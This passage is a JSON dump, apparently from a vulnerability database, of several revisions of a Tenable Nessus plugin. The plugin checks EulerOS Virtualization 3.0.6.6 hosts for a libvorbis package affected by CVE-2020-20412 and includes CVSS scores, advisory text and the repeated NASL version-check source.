script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-09T17:09:58", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "EULEROS_SA-2021-1493.NASL", "hash": "8de959b7cb629a4732a7cd77a9d65f23", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?81d647ec"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-07-28T22:16:50", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1440.NASL"]}], "modified": "2021-07-28T22:16:50", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-07-28T22:16:50", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-28T22:16:50", "differentElements": ["cpe", "cvss2", "cvss3", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr"], "edition": 3}, {"bulletin": {"id": "EULEROS_SA-2021-1493.NASL", "hash": "86a5076fce07b4bd78c66c26917dc24f", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412", "http://www.nessus.org/u?81d647ec"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-05T12:51:20", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1440.NASL"]}], "modified": "2021-08-05T12:51:20", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-05T12:51:20", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": [], "solution": "Update the affected libvorbis package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-05T12:51:20", "differentElements": ["cpe"], "edition": 4}, {"bulletin": {"id": "EULEROS_SA-2021-1493.NASL", "hash": "9eb6ad398de2cf2fa7d60e1366d9afd4", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412", "http://www.nessus.org/u?81d647ec"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-06T13:27:03", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1440.NASL"]}], "modified": "2021-08-06T13:27:03", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-06T13:27:03", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "solution": "Update the affected libvorbis package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-06T13:27:03", "differentElements": ["nessusSeverity"], "edition": 5}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1440.NASL"]}], "modified": "2021-08-19T12:06:04", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-19T12:06:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "solution": "Update the affected libvorbis package.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}]}